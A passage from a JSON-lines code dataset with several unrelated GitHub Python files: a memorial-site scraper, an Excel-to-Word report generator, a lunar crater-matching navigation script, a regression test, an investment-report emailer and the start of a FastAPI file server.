page')\n\tdriver.get(\"http://names.lawmemorial.org/search.html?q=\")\n\tsleep(2)\n\tdriver.find_element_by_name(\"query\").send_keys(state)\n\tdriver.find_element_by_class_name(\"query-submit\").click()\n\tprint('query submitted')\n\tsleep(3)\n\thtml = driver.page_source\n\twith open('nleo_mem_fund_search/' + html, 'w', encoding='utf8') as file:\n\t\tfile.write(r.text)\n\t\tprint('wrote file: ')\n\t# print(html)\n\n\n\t# r = requests.get(url)\n\t# # Declare naming convention. In this case, it will be named using the url contents after the '?'\n\t\n\t#name= 'query'\n\t# class_name= 'query-submit'\n\n\t# name = url.split('/')[-1].split('#')[-1] + '.html'\n\t# with open('nleo_mem_fund_search/' + name, 'w', encoding='utf8') as file:\n\t# \t# If you don't include the encoding parameter, you'll run into an error eventually\n\t# \tfile.write(r.text)\n\t# \tprint('wrote file: ' + str(name))\n\n\n\n#Create list of URLs to scrape\nstatelist()\n#Check to see query construction worked\n# pp(states2)\n# pp(stateurl)\n\n# call url list construction function\nurllist()\n# pp(urls)\n# pp(len(urls))\n\n\n#Run the function that saves the urls to a local json file\n# urls_to_json(stateurl, 'lawmemorial_links')\n# urls_to_json(urls, 'all_law_mem_links')\n\n#Call 'run' function, use sleep so we don't get blocked\n# for state in states[0]:\n# \trun(state)\n# \tprint('Saved page')\n# \tsleep(4)\n\nrun(states2[0])\n#Call 'run' function for specific URL index range, useful if an error is thrown during your scraping. \n# for url in urls[462:]:\n# \trun(url)\n# \tprint('Saved page')\n# \tsleep(4)\n\n# If your code throws an error during the scraping, search for the last file written (it'll probably be incomplete)\n# Grab the name of that incomplete file, add the full URL, run this print command to get the index position of where you left off. This one will return 462\n# With index in hand, call the 'run' function again and start from url position 462, give the function a range\n# print(urls.index('https://www.odmp.org/search?from=1951&to=2000&o=100'))\n\n\n\n# String url = webdriver.getCurrentUrl();\n# Then, all you have to do is replace old guid with a new guid.\n\n# int numOfChars = 36;\n# int posOfQuestionMark = url.indexOf(\"?\");\n# String newGuid = \"...\"; // put new/wrong guid value here\n# String newUrl = url.substring(0, posOfQuestionMark-numOfChars)+newGuid+url.substring(posOfQuestionMark);\n# --Edit--\n\n# Now, load this new url in the browser.\n\n# webdriver.get(newUrl);","repo_name":"alanhovorka/queries","sub_path":"police_deaths/attempt1.py","file_name":"attempt1.py","file_ext":"py","file_size_in_byte":6090,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"6372446890","text":"import datetime\nimport os\n\nfrom Excel import ExcelWrap\nfrom Word import WordWrap\n\n\nclass Filemaker:\n def __init__(self, file_path):\n self.cwd = os.getcwd()\n self.file_path = file_path\n self.excel = ExcelWrap(self.file_path)\n self.word = WordWrap()\n\n def getHeader(self):\n now = datetime.datetime.now()\n f = open(\"Header\", \"r\")\n return f.read() + ' ' + str(now.year)\n\n def totalProfit(self, data):\n summ = 0\n for d in data:\n summ += float(str(d).replace(',', '.'))\n return summ\n\n def getMain(self, data):\n data_d = {}.fromkeys(data, 0)\n maxx = 0\n max_n = None\n for a in data:\n data_d[a] += 1\n if data_d[a] > maxx:\n maxx = data_d[a]\n max_n = a\n return [max_n, maxx]\n\n def getProfitByCategories(self, category, profit):\n data_d = {}.fromkeys(category, 0)\n for i in range(self.excel.maxHeight - 1):\n number = round(float(str(profit[i]).replace(',', '.')))\n data_d[category[i]] += number\n\n return data_d\n\n def generte(self):\n self.word.addHeader(self.getHeader())\n print(self.excel.getCell(1, 9))\n\n data = self.getMain(self.excel.getWerticalRange(5, 2, self.excel.maxHeight + 1))\n\n # word.getStyleList()\n\n main_ship = \"Last year, our company mainly used \" + str(data[0]) + \" ship mode in count \" + str(\n data[1]) + \" of \" + str(\n self.excel.maxHeight) + \" total (\" + str(round((data[1] / self.excel.maxHeight) * 100)) + \"%). \"\n\n data = self.getMain(self.excel.getWerticalRange(9, 2, self.excel.maxHeight + 1))\n\n main_interest = \"Products were mainly interest to \" + str(data[0]) + \" customer segment.\"\n\n data = self.totalProfit(self.excel.getWerticalRange(6, 2, self.excel.maxHeight + 1))\n total_profit = \"Total profit is \" + str(round(data, 2)) + \".\"\n\n print(main_ship + main_interest + total_profit)\n\n data = self.getProfitByCategories(self.excel.getWerticalRange(10, 2, self.excel.maxHeight + 1),\n self.excel.getWerticalRange(6, 2, self.excel.maxHeight + 1))\n max = 0\n value = None\n for d in range(data.__len__()):\n if float(list(data.values())[d]) > max:\n max = list(data.values())[d]\n value = list(data.keys())[d]\n\n print(max, value)\n\n product_max_profit = 'The most profit comes from the sale of ' + value + ' product category (' + str(max) + ')'\n\n self.word.addParagraph(main_ship + main_interest + total_profit + product_max_profit)\n\n # word.addInlineExcelChart(file_path, 'D1', 640, 480)\n\n self.word.addParagraph(\"Monthly profit is shown in the following chart.\")\n self.excel.getChart2()\n self.word.addInlineExcelChart(self.cwd + '\\\\1.bmp')\n\n self.word.saveAs(self.cwd + '\\\\report.docx')\n\n self.excel.close()\n self.word.close()\n","repo_name":"leokk/ExcelToWord","sub_path":"FileMaker.py","file_name":"FileMaker.py","file_ext":"py","file_size_in_byte":3033,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"2410179108","text":"# External libraries\nimport numpy as np\nimport time\nimport matplotlib.pyplot as plt\nimport matplotlib.style as style\nimport pandas as pd\nimport astropy\nimport scipy\nfrom filterpy.kalman import KalmanFilter \nfrom filterpy.common import Q_discrete_white_noise\nfrom scipy.linalg import block_diag\nfrom astropy import units as u\nfrom poliastro.bodies import Earth, Mars, Sun, Moon\nfrom poliastro.twobody import Orbit\nfrom poliastro.plotting import OrbitPlotter2D\nfrom poliastro.plotting import OrbitPlotter3D\nfrom sklearn import linear_model, datasets\nimport glob\n\n# Own Libraries\nfrom utility.utils import *\nfrom EKF.kf import *\nfrom CAMDetector.detect import *\nfrom CMA.pair import *\nfrom CMA.icp import *\n\nstyle.use('seaborn-paper')\n\nglobal km2px, deg2km, px2km, deg2px\nglobal DT, TOL1, TOL2, TOL_S1, TOL_S2\n\n\ndef find_solution():\n\n def check_sol(I,J, tol, mode='natural'):\n # Auxiliary function to check if the solution is correct using the tolerance\n # mode = 'natural' or 'inverse'\n if mode == 'natural':\n row1 = iss[I]\n tmp = S[I].iloc[J]\n elif mode == 'inverse':\n row1 = S[I].iloc[J]\n tmp = iss[I]\n\n\n left_id = np.argmin([row1.lon1, row1.lon2, row1.lon3])\n right_id = np.argmax([row1.lon1, row1.lon2, row1.lon3])\n\n if left_id==0:\n left = [row1.lon1, row1.lat1, row1.r1]\n elif left_id==1:\n left = [row1.lon2, row1.lat2, row1.r2]\n elif left_id==2:\n left = [row1.lon3, row1.lat3, row1.r3] \n\n if right_id==0:\n right = [row1.lon1, row1.lat1, row1.r1]\n elif right_id==1:\n right = [row1.lon2, row1.lat2, row1.r2]\n elif right_id==2:\n right = [row1.lon3, row1.lat3, row1.r3] \n\n\n x1,x2,x3 = tmp.x1, tmp.x2, tmp.x3\n y1,y2,y3 = tmp.y1, tmp.y2, tmp.y3\n r1,r2,r3 = tmp.r1, tmp.r2, tmp.r3\n\n Left_id = np.argmin([x1,x2,x3])\n Right_id = np.argmax([x1,x2,x3])\n\n if Left_id==0:\n Left = [x1, y1, r1]\n elif Left_id==1:\n Left = [x2,y2,r2]\n elif Left_id==2:\n Left = [x3,y3,r3] \n\n if Right_id==0:\n Right = [x1,y1,r1]\n elif Right_id==1:\n Right = [x2,y2,r2]\n elif Right_id==2:\n Right = [x3,y3,r3]\n\n a=left[2]/Left[2]\n b=right[2]/Right[2]\n\n if a-b < tol:\n return True\n else: return False\n\n\n def plot_sol(I,J, mode):\n if mode == 'natural':\n row1 = iss[I]\n tmp = S[I].iloc[J]\n elif mode == 'inverse':\n tmp = iss[I]\n row1 = S[I].iloc[J]\n\n CAMx, CAMy = ((lon_bounds[0] + lon_bounds[1]) / 2,\n (lat_bounds[0] + lat_bounds[1]) / 2)\n\n\n crt1 = np.array([ row1.lon1, row1.lat1, row1.r1 ])\n crt2 = np.array([ row1.lon2, row1.lat2, row1.r2 ])\n crt3 = np.array([ row1.lon3, row1.lat3, row1.r3 ])\n triplet = [crt1, crt2, crt3]\n\n\n # img=cv2.imread(filename)\n img=np.zeros((850,850,3))\n deg2px = 256\n for crt in triplet:\n # crater center:\n xc, yc, rc = crt[0], crt[1], crt[2] # This is in the absolute frame\n # f: Absolute --> f: Relative\n xc = xc - CAMx\n yc = yc - CAMy\n # f: relative --> f: OPENCV\n xc *= deg2px # Now is in pixel not in lon deg\n yc *= deg2px # Now is in pixel not in lat deg\n # rc *= u # Now is in pixel not in lat deg\n\n\n xc = 850/2 + xc\n yc = 850/2 - yc\n center_coordinates = (int(xc), int(yc))\n # ? 1 km = 8.4746 px in our DEM := Merge LOLA - KAGUYA\n radius = int(crt[2] * km2px)\n color = (255, 255, 255)\n thickness = 3\n img_prova = cv2.circle(img, center_coordinates, radius, color, thickness)\n\n plt.figure(dpi=130)\n plt.subplot(121)\n plt.imshow(img_prova)\n plt.xlabel('CAT')\n plt.show()\n\n\n cp1 = cv2.imread(filename)\n x1,x2,x3 = tmp.x1, tmp.x2, tmp.x3\n y1,y2,y3 = tmp.y1, tmp.y2, tmp.y3\n r1,r2,r3 = tmp.r1, tmp.r2, tmp.r3\n cr1 = np.array([x1,y1,r1]) \n cr2 = np.array([x2,y2,r2]) \n cr3 = np.array([x3,y3,r3])\n crts = np.vstack([cr1,cr2,cr3])\n plt.subplot(122)\n plt.xlabel('DET')\n IMG1 = img_plus_crts(cp1, crts, color=\"red\")\n plt.imshow(IMG1)\n plt.show()\n\n def find_slope(P1:np.array,P2:np.array) -> float:\n slope = (P2[1]-P1[1])/(P2[0]-P1[0])\n return slope\n\n\n\n def check_sol2(I,J, tol, mode): \n if mode == 'natural':\n B = iss[I]\n A = S[I].iloc[J]\n elif mode == 'inverse':\n B = S[I].iloc[J]\n A = iss[I]\n\n hp = A\n x1_a, x2_a, x3_a = float(hp.x1), float(hp.x2), float(hp.x3)\n y1_a, y2_a, y3_a = float(hp.y1), float(hp.y2), float(hp.y3)\n r1_a, r2_a, r3_a = float(hp.r1), float(hp.r2), float(hp.r3)\n\n A1 = np.hstack([x1_a, y1_a, r1_a])\n A2 = np.hstack([x2_a, y2_a, r2_a])\n A3 = np.hstack([x3_a, y3_a, r3_a])\n\n A = np.vstack([A1, A2, A3])\n\n hp = B\n x1_b, x2_b, x3_b = float(hp.lon1), float(hp.lon2), float(hp.lon3)\n y1_b, y2_b, y3_b = float(hp.lat1), float(hp.lat2), float(hp.lat3)\n r1_b, r2_b, r3_b = float(hp.r1), float(hp.r2), float(hp.r3)\n\n x1_b_r, y1_b_r, r1_b_r = absolute2relative([x1_b, y1_b, r1_b], CAMx, CAMy)\n x2_b_r, y2_b_r, r2_b_r = absolute2relative([x2_b, y2_b, r2_b], CAMx, CAMy)\n x3_b_r, y3_b_r, r3_b_r = absolute2relative([x3_b, y3_b, r3_b], CAMx, CAMy)\n\n B1 = np.hstack([x1_b_r, y1_b_r, r1_b_r])\n B2 = np.hstack([x2_b_r, y2_b_r, r2_b_r])\n B3 = np.hstack([x3_b_r, y3_b_r, r3_b_r])\n\n B = np.vstack([B1, B2, B3])\n\n # identifiy points A:\n x1,x2,x3 = A[0][0], A[1][0], A[2][0]\n y1,y2,y3 = A[0][1], A[1][1], A[2][1]\n r1,r2,r3 = A[0][2], A[1][2], A[2][2]\n # Pick the ids:\n Left_id = np.argmin([x1,x2,x3])\n Right_id = np.argmax([x1,x2,x3])\n for id in [0,1,2]: \n if (id != Left_id) & (id != Right_id): Center_id = id \n # Reassign relate to ids:\n if Left_id==0:\n Left = [x1, y1, r1]\n elif Left_id==1:\n Left = [x2,y2,r2]\n elif Left_id==2:\n Left = [x3,y3,r3] \n\n if Right_id==0:\n Right = [x1,y1,r1]\n elif Right_id==1:\n Right = [x2,y2,r2]\n elif Right_id==2:\n Right = [x3,y3,r3]\n\n if Center_id==0:\n Center = [x1,y1,r1]\n elif Center_id==1:\n Center = [x2,y2,r2]\n elif Center_id==2:\n Center = [x3,y3,r3]\n # Calculate Orientation:\n alfa1 = find_slope(Left, Center)\n alfa2 = find_slope(Center, Right)\n alfa3 = find_slope(Left, Right)\n # print('\\n')\n # print(alfa1,alfa2, alfa3)\n # identifiy points B:\n x1,x2,x3 = B[0][0], B[1][0], B[2][0]\n y1,y2,y3 = B[0][1], B[1][1], B[2][1]\n r1,r2,r3 = B[0][2], B[1][2], B[2][2]\n # Pick the ids:\n Left_id = np.argmin([x1,x2,x3])\n Right_id = np.argmax([x1,x2,x3])\n for id in [0,1,2]: \n if (id != Left_id) & (id != Right_id): Center_id = id \n # Reassign relate to ids:\n if Left_id==0:\n Left = [x1, y1, r1]\n elif Left_id==1:\n Left = [x2,y2,r2]\n elif Left_id==2:\n Left = [x3,y3,r3] \n\n if Right_id==0:\n Right = [x1,y1,r1]\n elif Right_id==1:\n Right = [x2,y2,r2]\n elif Right_id==2:\n Right = [x3,y3,r3]\n\n if Center_id==0:\n Center = [x1,y1,r1]\n elif Center_id==1:\n Center = [x2,y2,r2]\n elif Center_id==2:\n Center = [x3,y3,r3]\n # Calculate Orientation:\n beta1 = find_slope(Left, Center)\n beta2 = find_slope(Center, Right)\n beta3 = find_slope(Left, Right)\n # print('\\n')\n # print(beta1,beta2,beta3)\n # R, t = icp(A,B)\n\n # sinteta = R[1,0]\n # costeta = R[0,0]\n # tanteta = sinteta/costeta\n # teta = np.arctan(tanteta)\n # teta = np.rad2deg(teta)\n\n # if abs(teta) < tol: return True\n # else: return False\n\n if (abs(alfa1-beta1) < tol) & (abs(alfa2-beta2) < tol) & (abs(alfa3-beta3) < tol): return True\n else: return False\n\n\n def filter_quartile(Xs):\n X = pd.DataFrame(Xs)\n # z = abs(stats.zscore(Z))\n # print(z)\n Q1 = X.quantile(0.48)\n Q3 = X.quantile(0.52)\n IQR = Q3 - Q1\n X = X[np.logical_not((X < (Q1 - 1.5 * IQR)) | (X > (Q3 + 1.5 * IQR)))]\n X = X.dropna()\n return np.array(X)\n################################################################################################\n# MAIN\n################################################################################################\n\n\n\n\n# def find_solution(TOL_S1, TOL_S2, TOL1, TOL2):\n ZF = []\n CRATERS_CAT, CRATERS_DET = [], []\n for idx in range(61):\n # Loading All Images:\n dict = load_all_images(dt=DT)\n # Img:\n filename = dict[str(idx+1)]\n img=cv2.imread(filename)\n # Detection:\n t1 = time.time()\n craters_det = detect(img)\n # Removing minor craters:\n craters_det = craters_det[craters_det[:,2] > 15]\n t2 = time.time()\n save_craters_det = craters_det.shape[0]\n print(f'Detection Time:{t2-t1:.2f}\\n')\n # Pandas DataFrame:\n df_craters_det = sort_mat(craters_det)\n # Find all triplets:\n t1 = time.time()\n triplets = find_all_triplets(craters_det)\n triplets_det= pd.DataFrame(triplets, columns=['Angle1','Angle2','Angle3','des1','des2','des3','x1','y1','r1','x2','y2','r2','x3', 'y3', 'r3'])\n triplets_det.shape\n t2 = time.time()\n print('\\n')\n print(f'Total craters founded:{craters_det.shape[0]}')\n print(f'Number of total combinations:{triplets_det.shape[0]}\\nComputational time: {t2-t1:.2f} s')\n\n\n\n # Opening Database:\n DB = pd.read_csv('DATA/H_L_combined.csv')\n # DB = pd.read_csv('DATA/lunar_crater_database_robbins_2018.csv')\n # Filtering:\n span = 3.29/2 * 1. \n lat_bounds=[-span, span]\n get_lon = float(filename.split('_')[-1].split('jpg')[0][:-2])\n lon_bounds=[get_lon-span,get_lon+span]\n\n craters_cat = CatalogSearch(DB, lat_bounds, lon_bounds, CAT_NAME='COMBINED')\n if craters_cat is not None:\n km2deg = 1/deg2km\n craters_cat = craters_cat[(craters_cat.Diam < 40)&(craters_cat.Diam > 2.5)]\n craters_cat['Diam']*=0.5*km2deg # km --- > deg\n save_craters_cat = craters_cat.shape[0]\n\n craters_cat_m = np.array(craters_cat)\n\n t1 = time.time()\n triplets_cat_m = find_all_triplets(craters_cat_m)\n triplets_cat = pd.DataFrame(triplets_cat_m, columns=['Angle1','Angle2','Angle3','des1','des2','des3','lon1','lat1', 'r1','lon2', 'lat2','r2','lon3','lat3','r3'])\n triplets_cat['r1'] *= deg2km\n triplets_cat['r2'] *= deg2km\n triplets_cat['r3'] *= deg2km\n t2 = time.time()\n print(f'Total craters catalogued:{craters_cat.shape[0]+1}')\n print(f'Number of total combinations:{triplets_cat.shape[0]}\\nComputational time: {t2-t1:.2f} s')\n else:\n print('No craters in cat!')\n\n\n if VERBOSE:\n #img1\n plt.figure(dpi=200, tight_layout=True)\n cp1 = deepcopy(img)\n img_det = img_plus_crts(img, craters_det)\n plt.subplot(122)\n plt.xticks([0,848/2,848],[f'{lon_bounds[0]:.2f}°',f'{(lon_bounds[1]+lon_bounds[0])/2:.2f}°',f'{lon_bounds[1]:.2f}°'])\n plt.yticks([0,848/2,848],[f'{lat_bounds[0]:.2f}°',f'{(lat_bounds[1]+lat_bounds[0])/2:.2f}°',f'{lat_bounds[1]:.2f}°'])\n plt.imshow(img_det)\n plt.xlabel('LON')\n plt.ylabel('LAT')\n plt.show()\n\n # FIG.2\n cp1 = deepcopy(img)\n # DB = pd.read_csv('DATA/lunar_crater_database_robbins_2018.csv')\n DB = pd.read_csv('DATA/H_L_combined.csv')\n df = CatalogSearch(DB, lat_bounds, lon_bounds, CAT_NAME='COMBINED')\n image_with_craters = draw_craters_on_image(df, lon_bounds, lat_bounds, cp1, u=None)\n\n plt.subplot(121)\n plt.imshow(image_with_craters)\n plt.xticks([0,850/2,850],[f'{lon_bounds[0]:.2f}°',f'{(lon_bounds[1]+lon_bounds[0])/2:.2f}°',f'{lon_bounds[1]:.2f}°'])\n plt.yticks([0,850/2, 850],[f'{lat_bounds[0]:.2f}°',f'{(lat_bounds[1]+lat_bounds[0])/2:.2f}°',f'{lat_bounds[1]:.2f}°'])\n plt.xlabel('LON')\n plt.ylabel('LAT')\n plt.show()\n\n\n\n tol1 = TOL_S1\n\n t1 = time.time()\n QUERY1 = triplets_cat\n QUERY2 = triplets_det\n QUERY1 = dropduplicates(QUERY1)\n QUERY2 = dropduplicates(QUERY2) \n\n if QUERY1.shape[0] 0:\n S.append(s)\n iss.append(items[i])\n t2 = time.time()\n print(f'Computational time: {t2-t1:.2f} s\\nPossible list Combinations: {len(S)}')\n\n\n\n # TEST\n CAMx, CAMy = ( (lon_bounds[0] + lon_bounds[1]) / 2, (lat_bounds[0] + lat_bounds[1]) / 2) # Location Absolute\n if mode == 'natural':\n for I in range(len(iss)):\n row1 = iss[I]\n J = 0\n for J in range(S[I].shape[0]):\n tmp = S[I].iloc[J]\n\n diff = compute_pos_diff(tmp, row1, CAMx, CAMy)\n diff = np.array(diff) # Is in pixel\n q = diff*px2km\n if np.all( abs(q) < 2):\n print(q, I,J)\n J+=1\n else:\n for I in range(len(S)):\n row1 = iss[I]\n J = 0\n for J in range(S[I].shape[0]):\n tmp = S[I].iloc[J]\n\n diff = compute_pos_diff(row1,tmp,CAMx, CAMy)\n diff = np.array(diff) # Is in pixel\n q = diff*px2km\n if np.all( abs(q) < 2):\n print(q, I,J)\n J+=1\n # VERIFICA:\n Is, Js = [], []\n for I in range(len(iss)):\n row1 = iss[I]\n for J in range(S[I].shape[0]):\n if check_sol(I,J, TOL1, mode): \n if check_sol2(I,J, TOL2, mode):\n Is.append(I)\n Js.append(J)\n print(I,J)\n Is = np.array(Is)\n Js = np.array(Js)\n\n\n\n Ts = []\n for i, j in zip(Is,Js):\n if mode == 'natural':\n tc = iss[i]\n td = S[i].iloc[j]\n elif mode == 'inverse':\n td = iss[i]\n tc = S[i].iloc[j]\n\n hp = td\n x1_a, x2_a, x3_a = float(hp.x1), float(hp.x2), float(hp.x3)\n y1_a, y2_a, y3_a = float(hp.y1), float(hp.y2), float(hp.y3)\n r1_a, r3_a, r3_a = float(hp.r1), float(hp.r2), float(hp.r3)\n\n A1 = np.hstack([x1_a, y1_a])\n A2 = np.hstack([x2_a, y2_a])\n A3 = np.hstack([x3_a, y3_a])\n\n A = np.vstack([A1, A2, A3])\n\n hp = tc\n x1_b, x2_b, x3_b = float(hp.lon1), float(hp.lon2), float(hp.lon3)\n y1_b, y2_b, y3_b = float(hp.lat1), float(hp.lat2), float(hp.lat3)\n r1_b, r2_b, r3_b = float(hp.r1), float(hp.r2), float(hp.r3)\n\n x1_b_r, y1_b_r, r1_b_r = absolute2relative([x1_b, y1_b, r1_b], CAMx, CAMy)\n x2_b_r, y2_b_r, r2_b_r = absolute2relative([x2_b, y2_b, r2_b], CAMx, CAMy)\n x3_b_r, y3_b_r, r3_b_r = absolute2relative([x3_b, y3_b, r3_b], CAMx, CAMy)\n\n B1 = np.hstack([x1_b_r, y1_b_r])\n B2 = np.hstack([x2_b_r, y2_b_r])\n B3 = np.hstack([x3_b_r, y3_b_r])\n\n B = np.vstack([B1, B2, B3])\n\n R, t = icp(A,B)\n Ts.append(t)\n print(len(Ts))\n\n\n\n # Reallocate points\n Xs, Ys = [], []\n for t in Ts:\n Xs.append(t[0])\n Ys.append(t[1])\n\n # Calculate Error on position\n if len(Ts)>3:\n Xs = filter_quartile(Xs)\n Ys = filter_quartile(Ys)\n Xs = np.mean(Xs)\n Ys = np.mean(Ys)\n Z = np.hstack([Xs,Ys])\n ZF.append(abs(Z*px2km*1000))\n CRATERS_CAT.append(save_craters_cat)\n CRATERS_DET.append(save_craters_det)\n\n elif len(Ts)>0:\n Xs = np.mean(Xs)\n Ys = np.mean(Ys)\n Z = np.hstack([Xs,Ys])\n ZF.append(abs(Z*px2km*1000))\n CRATERS_CAT.append(save_craters_cat)\n CRATERS_DET.append(save_craters_det)\n else:\n print('No combination Found, impossible to estimate position...')\n ZF.append(np.array([-1,-1]))\n CRATERS_CAT.append(-1)\n CRATERS_DET.append(-1)\n\n CRATERS_CAT= np.array(CRATERS_CAT)\n CRATERS_DET= np.array(CRATERS_DET)\n\n CRATERS_CAT= CRATERS_CAT[CRATERS_CAT>0]\n CRATERS_DET= CRATERS_DET[CRATERS_DET>0]\n\n X,Y = [], []\n for i in ZF:\n if np.all( i > 0):\n X.append(i[0])\n Y.append(i[1])\n \n X = np.array(X)\n Y = np.array(Y)\n\n X_mean = np.mean(filter_quartile(X))\n Y_mean = np.mean(filter_quartile(Y))\n if len(X) > 0:\n plt.figure(dpi=300)\n plt.scatter(range(len(X)),X)\n plt.scatter(range(len(Y)),Y)\n plt.legend(['Error-X','Error-Y'])\n plt.title(f'TOL_S1:{TOL_S1}, TOL_S2:{TOL_S2}, TOL1:{TOL1}, TOL2:{TOL2}')\n plt.ylabel('m')\n plt.xlabel('Estimation completed')\n plt.ylim([0, 2000])\n plt.savefig(f'A_Mx_{X_mean:.2f}_My_{Y_mean:.2f}_Comp_{X.shape[0]:.2f}.jpg')\n plt.show()\n\n plt.figure(dpi=300)\n plt.scatter(range(len(CRATERS_CAT)), CRATERS_CAT)\n plt.scatter(range(len(CRATERS_DET)), CRATERS_DET)\n plt.legend(['Craters Cat','Craters Det'])\n plt.title(f'TOL_S1:{TOL_S1}, TOL_S2:{TOL_S2}, TOL1:{TOL1}, TOL2:{TOL2}')\n plt.savefig(f'B_Mx_{X_mean:.2f}_My_{Y_mean:.2f}_Comp_{X.shape[0]:.2f}.jpg')\n plt.show()\n\n\nif __name__ == '__main__':\n\n VERBOSE=False\n DT = 10\n\n for TOL1 in [0.08,0.1,0.12,0.14]:\n for TOL2 in [0.8,0.10,0.12,0.14,0.16]:\n for TOL_S1 in [3,4,5,6,7]:\n for TOL_S2 in [0.8,1,1.2,1.4]:\n find_solution()\n plt.close('all')","repo_name":"sirbastiano/AINavi","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":19877,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"37"} +{"seq_id":"9349749490","text":"from LinearRegression1D import *\nfrom NormalEquation import *\nfrom sklearn import datasets\n\n\nM = 1 #No. of features. Set M = 1 to test LinearRegression1D\nN = 100 #No. of Samples\n\nx, y, coef = datasets.make_regression(n_samples=N,#number of samples\n n_features=M,#number of features\n n_informative=M,#number of useful features \n noise=25,#bias and standard deviation of the guassian noise\n coef=True,#true coefficient used to generated the data\n random_state=42) #set for same data \n\n\n#mlr = LinearRegression1D() #Un-comment to fit using LinearRegression1D\nmlr = NormalEquation() #Un-comment to fit using NormalEquation\nmlr.fit(x,y)\nmlr.error_metrics()\nmlr.fit_plot() \n\n\n\n","repo_name":"biswarupk98/Intro-to-computing-in-ai-ml","sub_path":"A4_biswarupk_21055/Test.py","file_name":"Test.py","file_ext":"py","file_size_in_byte":893,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"37"} +{"seq_id":"7382821652","text":"import datetime\nimport json,time\n\nfrom Investir import Log, Sheet, Historico\nfrom Ploting import Plot\nfrom Email import EnviaEmail\n\ndef j_data(json_file):\n with open(json_file, 'r') as read:\n return json.load(read)\n\ndef adiciona_horario():\n timestamp = int(datetime.datetime.timestamp(datetime.datetime.now())) + 60\n novo_horario = datetime.datetime.fromtimestamp(timestamp).strftime('%H:%M')\n return novo_horario\n\nJSON_FILE = 'investimentos.json' # arquivo json que ficarao os dados recentes\nJSON_FILE_HIST = 'investimentos_historico.json' # arquivo json com os dados historicos para o grafico\nSHEET_URL = ['https://www.googleapis.com/auth/spreadsheets.readonly']\nSHEET_ID = '' # id da sua planilha\nRANGE_NAME = 'Investimentos!A2:E' # planilha aba Investimentos coluna inciando da celula A2 até E\nTOKEN = 'token.json'\nCREDENCIAIS = 'credencials.json'\n\nend_email_envio = '' # endereço de email (gmail) que enviará\nsenha_envio = '' # senha para logar na caixa de email do google\nend_email_recebe = '' # endereco do destino\nCOLOR = 3\n\nhora_programada = ['08:00', '09:00', '10:00', '11:00', '11:50']\nhora_envio = '12:00'\nconteudo = \"\"\n\ndef atualiza():\n global hora_programada\n global conteudo\n try:\n momento_execucao = datetime.datetime.now().strftime('%H:%M')\n if momento_execucao in hora_programada:\n Log.informacao('criando lista com dados da nuvem')\n sheet = Sheet(TOKEN, CREDENCIAIS, SHEET_ID, RANGE_NAME, SHEET_URL)\n l_sheet = sheet.get_sheet()\n Log.informacao('iniciando o tratamento dos dados')\n relatorio = Historico(l_sheet, JSON_FILE, JSON_FILE_HIST)\n relatorio.atualiza_dados()\n relatorio.atualiza_dados_historico(JSON_FILE_HIST, l_sheet)\n conteudo = relatorio.rendimentos_str(JSON_FILE_HIST)\n hora_programada = ['08:00', '09:00', '10:00', '11:00', '11:50']\n except Exception as erro:\n Log.informacao(f'houve erro na execuçaõ do metodo atualiza(), {erro}')\n hora_programada.append(adiciona_horario())\n\ndef relatorios():\n global hora_envio\n plt = Plot(j_data(JSON_FILE_HIST),j_data(JSON_FILE_HIST), COLOR)\n try:\n momento_execucao = datetime.datetime.now().strftime('%H:%M')\n if momento_execucao == hora_envio:\n Log.informacao('iniciando tratativa para envio do email')\n email = EnviaEmail(end_email_envio, end_email_recebe, senha_envio, conteudo)\n email.insere_imagem(plt.plot_todos())\n email.insere_imagem(plt.plot())\n email.envia()\n hora_envio = '12:00'\n else:\n Log.informacao(f'aguardando momento do envio do relatorio: {hora_envio} horas')\n except Exception as erro:\n Log.informacao(f'houve erro na execuçaõ do metodo relatorios(), {erro}')\n hora_envio = adiciona_horario()\n\ndef main():\n atualiza()\n relatorios()\n\ndef teste():\n pass\n\nif __name__ == '__main__':\n while True:\n main()\n # teste()\n time.sleep(60)","repo_name":"ram-eron/relatorio_investimentos","sub_path":"Relatorio.py","file_name":"Relatorio.py","file_ext":"py","file_size_in_byte":3049,"program_lang":"python","lang":"pt","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"2079817516","text":"import asyncio\nimport mimetypes\nfrom pathlib import Path\nfrom typing import List\n\nimport aiohttp as aiohttp\nimport uvicorn\nfrom fastapi import FastAPI, HTTPException\nfrom fastapi.middleware.cors import CORSMiddleware\nfrom fastapi.middleware.gzip import GZipMiddleware\nfrom fastapi.responses import FileResponse, Response\n\nimport preview_builder\nimport utils\nfrom models import FileInfo, ServerFilePath\n\nBASE_FILE_PATH = \"C:/Users/Yan_X/Desktop/\"\nMIME_FILE_PATH = \"mime.types\"\nBACKEND_BASE_URL = \"http://localhost:3000/\"\n\nmimetypes.init([MIME_FILE_PATH])\napp = FastAPI()\n\napp.add_middleware(\n CORSMiddleware,\n allow_origins=[\"*\"],\n allow_credentials=True,\n allow_methods=[\"*\"],\n allow_headers=[\"*\"],\n)\napp.add_middleware(GZipMiddleware, minimum_size=1000)\n\nclient_session = aiohttp.ClientSession(base_url=BACKEND_BASE_URL)\n\n\n@app.on_event(\"shutdown\")\nasync def shutdown_event():\n await client_session.close()\n\n\n@app.get(\"/\")\nasync def root():\n return await read_file_path('')\n\n\n@app.get(\"/{file_path:path}\")\nasync def read_file_path(file_path: str, download: int = 0, preview: int = 0):\n local_path = Path(BASE_FILE_PATH + file_path)\n if local_path.exists() and local_path.is_file():\n if preview:\n tmp_local_path = preview_builder.image_builder(file_path)\n\n return FileResponse(tmp_local_path, content_disposition_type='inline', filename=Path(tmp_local_path).name)\n if download:\n return FileResponse(local_path, content_disposition_type='attachment', filename=local_path.name)\n else:\n return FileResponse(local_path, content_disposition_type='inline', filename=local_path.name)\n\n async with client_session.get('/' + file_path) as response:\n return Response(await response.content.read(), response.status, response.headers)\n\n\n@app.post(\"/api/path_info\", response_model=List[FileInfo])\nasync def path_info(path: ServerFilePath):\n info_list: List[FileInfo] = []\n\n local_path = Path(BASE_FILE_PATH + path.path)\n\n if not local_path.exists():\n raise HTTPException(status_code=400, detail=\"Path is not exists\")\n if local_path.is_file():\n raise 